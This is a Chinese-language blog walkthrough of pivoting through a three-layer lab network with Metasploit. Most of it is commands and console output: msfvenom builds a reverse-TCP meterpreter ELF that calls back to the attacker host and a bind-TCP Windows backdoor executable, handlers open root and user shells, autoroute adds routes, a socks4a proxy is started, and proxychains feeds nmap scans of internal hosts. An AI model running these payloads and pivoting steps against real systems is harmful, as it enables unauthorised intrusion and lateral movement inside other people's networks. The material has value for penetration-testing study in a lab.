多层网络下的内网穿透
September 11, 2020 WEB渗透测试 访问: 74 次
环境准备
攻击机:kali
靶机:
第一层:ubuntu-16 开放apache服务
第二层:windows-10 开放python-http服务
第三层:ubuntu-18 开放python-http服务
网络拓扑结构:
第一层靶机
通过msfvenom生成shell.elf
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.37.129.4 LPORT=10001 -f elf > shell.elf
通过msf来接收shell
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.37.129.4
lhost => 10.37.129.4
msf5 exploit(multi/handler) > set lport 10001
lport => 10001
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.37.129.4:10001
[*] Sending stage (3021284 bytes) to 10.37.129.3
[*] Meterpreter session 1 opened (10.37.129.4:10001 -> 10.37.129.3:51818) at 2020-09-11 11:59:42 +0800
meterpreter > shell
Process 5755 created.
Channel 1 created.
whoami
root
exit
meterpreter > ipconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : enp0s5
Hardware MAC : 00:1c:42:bf:dc:a6
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.129.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:1:acba:39b0:bd5c:a5de
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::593f:cc6d:4234:e5e6
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : enp0s6
Hardware MAC : 00:1c:42:dd:88:60
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.132.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:2:2126:9877:d1c1:6a6d
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::f69e:4ffb:a6c2:77cd
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fdb2:2c26:f4e4:2:e68c:2f44:d7a9:162a
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 4
============
Name : docker0
Hardware MAC : 02:42:35:29:f2:ef
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0
meterpreter >
发现第二层网络10.37.132.4
我们通过msf添加路由
meterpreter > run autoroute -s 10.37.132.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.132.0/255.255.255.0...
[+] Added route to 10.37.132.0/255.255.255.0 via 10.37.129.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 1
meterpreter >
然后通过background返回到msf的上一级,利用use auxiliary/scanner/portscan/tcp来扫描第二层网络中80端口开启的主机
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.37.132.1/24
RHOSTS => 10.37.132.1/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80
msf5 auxiliary(scanner/portscan/tcp) > run
[+] 10.37.132.4: - 10.37.132.4:80 - TCP OPEN
[+] 10.37.132.5: - 10.37.132.5:80 - TCP OPEN
[*] 10.37.132.1/24: - Scanned 26 of 256 hosts (10% complete)
[*] 10.37.132.1/24: - Scanned 52 of 256 hosts (20% complete)
[*] 10.37.132.1/24: - Scanned 77 of 256 hosts (30% complete)
[*] 10.37.132.1/24: - Scanned 103 of 256 hosts (40% complete)
可以发现10.37.132.5存活,利用msf搭建socks4a代理
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9999
SRVPORT => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) >
[*] Starting the socks4a proxy server
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 9999 yes The port to listen on.
Auxiliary action:
Name Description
---- -----------
Proxy
msf5 auxiliary(server/socks4a) >
在kali的浏览器中搭建代理,127.0.0.1:9000,即可通过浏览器访问到第二层主机10.37.132.5开放的服务
利用proxychains扩大利用手法,配置/etc/proxychains.conf
dynamic_chain
ocks4 127.0.0.1 9999
值得注意的地方就是,proxychains不支持udp和cmp协议
proxychains+nmap扫描
proxychains nmap -sT -Pn 10.37.132.5
Nmap scan report for windows10.host-only--2 (10.37.132.5)
Host is up (0.0020s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds
连接第二层的靶机我们需要正向连接,第二层的靶机无法直接访问到我们的攻击机
生成windows后门文件
msfvenom -p windows/meterpreter/bind_tcp LPORT=6668 -f exe > shell_3.exe
msf连接:
msf5 auxiliary(scanner/portscan/tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.37.132.5
rhost => 10.37.132.5
msf5 exploit(multi/handler) > set lport 6668
lport => 6668
msf5 exploit(multi/handler) > exploit -j
[*] Started bind TCP handler against 10.37.132.5:6668
[*] Sending stage (180291 bytes) to 10.37.132.5
[*] 10.37.132.5 - Meterpreter session 3 closed. Reason: Died
[*] Meterpreter session 3 opened (10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668) at 2020-09-11 17:29:25 +0800
msf5 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/linux uid=0, gid=0, euid=0, egid=0 @ 10.37.129.3 10.37.129.4:10001 -> 10.37.129.3:53086 (10.37.129.3)
4 meterpreter x86/windows F449\radish @ F449 10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668 (10.37.132.5)
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > ls
在第二层的session中设置路由
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 2
meterpreter > run autoroute -s 10.37.133.0/24
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.133.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x86_Win
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.37.132.0 255.255.255.0 Session 2
10.37.133.0 255.255.255.0 Session 4
meterpreter >
不知道为什么会报错,但是浏览器代理是可以访问到第三层的机器